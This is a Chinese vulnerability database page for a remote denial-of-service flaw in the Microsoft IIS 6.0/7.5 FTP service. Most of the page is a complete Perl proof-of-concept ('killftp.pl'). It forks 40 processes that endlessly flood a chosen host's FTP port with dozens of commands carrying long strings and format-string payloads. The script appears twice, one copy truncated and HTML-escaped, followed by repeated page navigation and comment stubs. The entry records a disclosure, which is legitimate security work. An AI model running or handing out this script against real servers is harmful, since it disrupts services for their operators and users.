Microsoft IIS多个FTP命令请求远程拒绝服务漏洞

基本字段

漏洞编号：: SSV-60256

披露/发现时间：: 未知

提交时间：: 2012-07-06

漏洞等级：

漏洞类别：: 拒绝服务

影响组件：: Microsoft IIS httpd
(7.5,6.0)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.35KB

BUGTRAQ ID: 54276

Internet Information Services（IIS，互联网信息服务）是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。

Microsoft IIS 6.0和7.5在实现上存在远程安全漏洞，攻击者可利用此漏洞造成受影响应用不响应。 0 Microsoft IIS 7.5 Microsoft IIS 6.0 厂商补丁：

Microsoft

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

共 1 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.35KB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
     print &quot;Please DISABLE firewall daemon of this operating system first!\n&quot;;
     print &quot;FTP Server Remote Denial Of Service\n&quot;;
     print &quot;by coolkaveh\n&quot;;
     print &quot;usage: perl killftp.pl &lt;host&gt; \n&quot;;
     print &quot;example: perl killftp.pl www.example.com \n&quot;; } $host=shift; $port=shift || &quot;21&quot;; if(!defined($host)){
    print &quot;Please DISABLE firewall daemon of this operating system first!\n&quot;;
     print &quot;FTP Server Remote Denial Of Service\n&quot;;
     print &quot;by coolkaveh\n&quot;;
    print &quot;coolkaveh@rocketmail.com\n&quot;;
     print &quot;usage: perl killftp.pl &lt;host&gt; \n&quot;;
     print &quot;example: perl killftp.pl www.example.com \n&quot;;
    exit(0);
}
$check_first=IO::Socket::INET-&gt;new(PeerAddr=&gt;$host,PeerPort=&gt;$port,Timeout=&gt;60);
if(defined $check_first){
    print &quot;$host -&gt; $port is alive.\n&quot;;
    $check_first-&gt;close;
}
else{
die(&quot;$host -&gt; $port is closed!\n&quot;);
}
@junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,
'A'x12288,'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
);
@command=(
'NLST','CWD','STOR','RETR',
'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD', 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX', 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

#!/usr/bin/perl -w use IO::Socket; use Parallel::ForkManager; $|=1; sub usage { print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){ print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh@rocketmail.com\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193, 'A'x12288,'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s', '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p', '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100', '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1', ); @command=( 'NLST','CWD','STOR','RETR', 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD', 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX', 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM', 'SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I', 'NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE', 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD','DELE', 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E', 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', 'TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E', 'TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', 'TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR', 'RNTO','LIST','MDTM','SIZE','REST' ); print "Dosing Server!\n"; $pm = new Parallel::ForkManager(40); while (1) { my $pid = $pm->start and next; COMMAND_LIST: foreach $cmd (@command){ foreach $poc (@junk){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->send("$cmd"." "."$poc\r\n", 0); $sock4->recv($content, 0, 900); } } } $pm->finish; }

共 4 兑换

参考链接

解决方案

临时解决方案

无

官方解决方案

升级到最新无漏洞版本

防护方案

无

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

Microsoft IIS多个FTP命令请求远程拒绝服务漏洞

基本字段

来源

漏洞详情

Microsoft

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

全部评论 (1)

Microsoft IIS多个FTP命令请求远程拒绝服务漏洞

基本字段

来源

漏洞详情

Microsoft

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

全部评论 (1)

您好，

您好，

评论前需绑定手机现在绑定